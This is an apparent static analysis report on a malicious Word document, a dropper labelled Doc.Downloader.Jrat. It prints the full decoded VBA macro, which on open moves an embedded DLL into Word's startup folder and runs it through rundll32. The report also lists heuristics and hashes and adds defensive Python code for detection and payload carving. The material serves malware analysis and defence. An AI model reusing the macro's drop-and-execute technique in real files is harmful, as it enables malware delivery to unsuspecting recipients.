Doc.Downloader.Jrat-6336393-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 c29b1cab77fd8a6a…

MALICIOUS

Office (OLE)

Size: 1.27 MB · Created: 2021-05-24 12:28:00 · Authoring application: Microsoft Office Word · First seen: 2021-06-13
MD5: ca999f765f35d0988e451960ca718714
SHA-1: dc53cfd966ce979c80a170b3e8ce3eac48f50332
SHA-256: c29b1cab77fd8a6ae8cea0795a39167b90fa78381ddb92016c6612b1d8ec272d
Risk score: 530

Malware Insights

Doc.Downloader.Jrat-6336393-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1105 Ingress Tool Transfer · T1071.001 Web Protocols · T1566.001 Spearphishing Attachment

The sample carries a Document_Open VBA macro, so the chain runs as soon as a recipient opens the file and allows macros (T1566.001, T1204.002, T1059.005). The macro first checks whether ket.t already exists in Word's startup folder (Options.DefaultFilePath(wdStartupPath), by default %APPDATA%\Microsoft\Word\STARTUP) and does nothing if it does. Otherwise yyy() walks the selection a few lines into the document and copies it, which appears intended to make the OLE Packager write the embedded Package object's file out to disk; xxx() then recursively searches Word's temp folder (wdTempFilePath) for a file named jax.k, the display name of the embedded Ole10Native package listed under extracted artifacts. The hit is moved with the Name statement into the startup folder as ket.t and launched with Shell as rundll32.exe <startup>\ket.t,EUAYKIYBPAX, i.e. ket.t is loaded as a DLL regardless of its extension and its export EUAYKIYBPAX is called. The executable name is assembled at run time ("rundll32" & ued with ued = ".exe") to defeat naive string matching on "rundll32.exe".

Nothing in the macro downloads anything, and the only URL in the document is an OOXML schema namespace, so the static evidence shows a dropper whose payload (a PE file) is embedded as an OLE Package. The "Downloader" label comes from the ClamAV family name Doc.Downloader.Jrat-6336393-1; the T1105 and T1071.001 techniques above describe what the dropped DLL is expected to do rather than behaviour observed in this macro, and should be confirmed by running or reversing the payload.
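The runtime side of the chain above is a rundll32.exe process started by WINWORD.EXE with a module path that has no .dll extension and sits in Word's startup folder. The following is an added example (not part of the original report or of any named tool) of a detection that scores process-creation events on exactly those three properties. The events are constructed, with Word's default startup path %APPDATA%\Microsoft\Word\STARTUP filled into the Shell line from the macro; the Office install path and the benign rundll32 launches are likewise made up for the test.

```python
import re
from dataclasses import dataclass

# Office processes that should essentially never spawn rundll32.exe on their own.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Path fragments a standard user can write to; legitimate rundll32 modules rarely live here.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\", "\\downloads\\")
# Word's default startup folder (%APPDATA%\Microsoft\Word\STARTUP), the drop location in this sample.
WORD_STARTUP = "\\microsoft\\word\\startup\\"


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields a Sysmon event 1 or an EDR log would carry)."""
    parent_image: str
    image: str
    command_line: str


def parse_rundll32(command_line: str):
    """Return (module_path, export) from 'rundll32.exe <module>,<export> [args]', or None."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s+(?:"([^"]+)"|([^\s,]+))(?:\s*,\s*(\S+))?', command_line)
    if not m:
        return None
    module = m.group(1) or m.group(2)
    export = m.group(3) or ""
    return module, export


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcEvent) -> list:
    """Reasons this rundll32 launch resembles the ket.t pattern; empty list if none apply."""
    reasons = []
    if _basename(event.image) != "rundll32.exe":
        return reasons
    parsed = parse_rundll32(event.command_line)
    if parsed is None:
        return reasons
    module, _export = parsed
    mod_l = module.lower()
    name = _basename(module)
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if _basename(event.parent_image) in OFFICE_PARENTS:
        reasons.append("rundll32 spawned by an Office process")
    if ext not in ("dll", "cpl", "ax", "ocx"):
        # rundll32 ignores the extension: ket.t is loaded as a DLL all the same
        reasons.append("module has non-DLL extension %r" % ("." + ext))
    if WORD_STARTUP in mod_l:
        reasons.append("module lives in the Word STARTUP folder")
    elif any(frag in mod_l for frag in USER_WRITABLE):
        reasons.append("module lives in a user-writable path")
    return reasons


def should_alert(event: ProcEvent) -> bool:
    """Two independent indicators are required; any one alone is too noisy to page on."""
    return len(assess(event)) >= 2


# Constructed events, not real telemetry. EVENTS[0] mirrors the Shell line in the macro.
EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\MyPc\AppData\Roaming\Microsoft\Word\STARTUP\ket.t,EUAYKIYBPAX"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(should_alert(ev), assess(ev), ev.command_line)
```

The third event (Word launching rundll32 with a system DLL) scores one indicator and stays below the alert line; the Office-parent indicator on its own is useful context but is not specific enough to page on. The same parser also covers the quoted-path form `rundll32.exe "C:\path with spaces\x.dll",Entry`.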

Heuristics 14

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    The OLE ObjectPool contains an EPRINT stream carrying EMF data. This is rare in benign documents and is consistent with the object-delivery techniques seen in Office exploit documents, but the rule only establishes that the stream is present: attributing a specific CVE would require the malformed graphics record itself, which this rule does not prove.
  • ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set FSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1535 bytes
SHA-256: 5e458372b4eacd99b55dfb9dd878b8d73a6d16041b2f88dd89494ac82a5a6488
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Compare Text
Option Explicit
Dim pafs As String

Private Sub Document_Open()
Dim uis As String
uis = Options.DefaultFilePath(wdStartupPath)
If Dir(uis & "\ket.t") = "" Then
Call yyy

Call xxx

If pafs = "" Then

Else
Dim iel As String
Dim ued As String
ued = ".exe"
iel = Options.DefaultFilePath(wdStartupPath)
Name pafs As iel & "\ket.t"
Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
End If
End If
End Sub
Sub xxx()

 Dim FSO As Object
   Set FSO = CreateObject("Scripting.FileSystemObject")
Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath))
End Sub
Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub

 
 Sub Search(mds As Object)
 Dim Mysob As Object
 Dim Fil As Object
  
   For Each Mysob In mds.SubFolders
     Search Mysob
   Next Mysob
   For Each Fil In mds.Files
   
   If Fil.Name = "jax.k" Then
       
        pafs = Fil
        End If
   Next Fil
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub
Filename: embedded_office_0008f668.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x8F668
Size: 748440 bytes
SHA-256: ece6f048dba84b9c3bda01679bc7a12de032ba3b9b4295265433c563e67c6aa9
Detection: ClamAV: No threats found
Static triage: Obfuscation or payload: likely. Carved macro source contains an auto-exec entry point and execution/download terms.

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1683339287/Ole10Native
Size: 721178 bytes
SHA-256: 179a6087ccdf242416537dc8c851e489a00cf7da8f951eed54bf22f326a252f9

Filename: ole10native_00_jax.k
Kind: ole-package-payload
Source: OLE Ole10Native payload: ObjectPool/_1683339287/Ole10Native; display_name=jax.k; full_path=C:\Users\MyPc\AppData\Local\Temp\jax.k; temp_path=; def_file=
Size: 720896 bytes
SHA-256: 5fd6d4de1030418e65a24b64e301d3a086e62c3ef2348c79c5a32e2cb307128a

Note on the two PE carves: the Ole10Native payload (720896 bytes, display name jax.k) is the file the macro searches for, so its size and hash are the ones to pivot on. The offset-based carve is most likely the same binary located by scanning the raw file for an MZ header but cut at end-of-file rather than at the package's declared data size (0x8F668 + 748440 bytes comes to roughly the 1.27 MB file size), so it includes trailing bytes and its hash does not identify the payload. The clean ClamAV verdict on that carve should not be read as clearing the payload either: the detection on this sample fires on the document wrapper, and the dropped DLL needs to be detonated or reversed separately, starting from the export named on the rundll32 command line (EUAYKIYBPAX).
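The ole10native_00_jax.k artifact is produced by splitting the Ole10Native stream into its Packager header (display name, original path, temp path) and the packaged bytes. The following is an added example, written for this page and not taken from oletools or any other tool, of that carving step plus the two triage checks an analyst wants on the result: is the packaged file a PE, and does its display name disguise that. The stream layout used (u32 size, u16 flags, two NUL-terminated ANSI strings, u16 flags2, u16 unknown, length-prefixed temp path, u32 data size, data) is the commonly documented Packager layout and is assumed here; the trailing UTF-16 copies of the strings that real streams carry are not needed for carving and are ignored. The sample stream is constructed by the block itself around a fake PE header, not the sample's real 720896-byte binary.

```python
import hashlib
import struct


def _cstring(buf: bytes, pos: int):
    """Read a NUL-terminated ANSI string starting at pos; return (text, position after the NUL)."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def parse_ole10native(stream: bytes) -> dict:
    """Split an Ole10Native (OLE Package) stream into header fields and the packaged file.

    Assumed layout (commonly documented Packager format):
      u32 size of the rest of the stream, u16 flags (0x0002 = embedded file),
      ASCIIZ label (display name), ASCIIZ original full path, u16 flags2, u16 unknown,
      u32 length of temp path incl. NUL, ASCIIZ temp path, u32 data size, data bytes.
    """
    total, flags = struct.unpack_from("<IH", stream, 0)
    if total > len(stream) - 4:
        raise ValueError("declared size %d exceeds stream length" % total)
    pos = 6
    label, pos = _cstring(stream, pos)
    full_path, pos = _cstring(stream, pos)
    pos += 4  # flags2 + unknown short, not needed for carving
    (tmp_len,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    temp_path = stream[pos:pos + tmp_len].rstrip(b"\x00").decode("latin-1")
    pos += tmp_len
    (data_len,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    payload = stream[pos:pos + data_len]
    if len(payload) != data_len:
        raise ValueError("payload truncated: header says %d bytes, %d present" % (data_len, len(payload)))
    return {"flags": flags, "label": label, "full_path": full_path,
            "temp_path": temp_path, "payload": payload}


def looks_like_pe(data: bytes) -> bool:
    """MZ header plus a PE\\0\\0 signature at e_lfanew (the u32 at offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_package(stream: bytes) -> dict:
    """Carve the packaged file and report the facts an analyst pivots on."""
    pkg = parse_ole10native(stream)
    payload = pkg["payload"]
    label = pkg["label"]
    ext = label.rsplit(".", 1)[-1].lower() if "." in label else ""
    is_pe = looks_like_pe(payload)
    findings = []
    if is_pe:
        findings.append("packaged file is a PE executable")
        if ext not in ("exe", "dll", "scr", "cpl"):
            # jax.k in the sample: a DLL parked under an extension nothing associates with code
            findings.append("PE hidden under non-executable extension .%s" % ext)
    return {"label": label, "full_path": pkg["full_path"], "temp_path": pkg["temp_path"],
            "size": len(payload), "sha256": hashlib.sha256(payload).hexdigest(),
            "is_pe": is_pe, "findings": findings}


def is_truncated(stream: bytes) -> bool:
    """True if the stream's own size fields do not match the bytes actually present."""
    try:
        parse_ole10native(stream)
        return False
    except ValueError:
        return True


def build_ole10native(label: str, full_path: str, payload: bytes, temp_path: str = "") -> bytes:
    """Constructed sample builder: assemble a stream in the layout parse_ole10native expects."""
    tmp = temp_path.encode("latin-1") + b"\x00"
    body = (struct.pack("<H", 2)
            + label.encode("latin-1") + b"\x00"
            + full_path.encode("latin-1") + b"\x00"
            + struct.pack("<HHI", 0, 3, len(tmp)) + tmp
            + struct.pack("<I", len(payload)) + payload)
    return struct.pack("<I", len(body)) + body


# Constructed stand-in for the real payload: an MZ stub with e_lfanew = 0x80 pointing at "PE\0\0".
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80) + b"\x00" * 0x40 + b"PE\x00\x00" + b"\x00" * 20
# Label and original path are the ones recorded for the sample's package above; temp path is empty there too.
SAMPLE_STREAM = build_ole10native("jax.k", r"C:\Users\MyPc\AppData\Local\Temp\jax.k", FAKE_PE)

if __name__ == "__main__":
    print(triage_package(SAMPLE_STREAM))
```

Against a real document, the stream bytes come from the OLE container, e.g. `olefile.OleFileIO(path).openstream("ObjectPool/_1683339287/Ole10Native").read()`, and the carved payload's SHA-256 is what to compare with the ole10native_00_jax.k hash above. The size check on the data length matters in practice: a truncated or padded stream would otherwise hash to something that matches nothing.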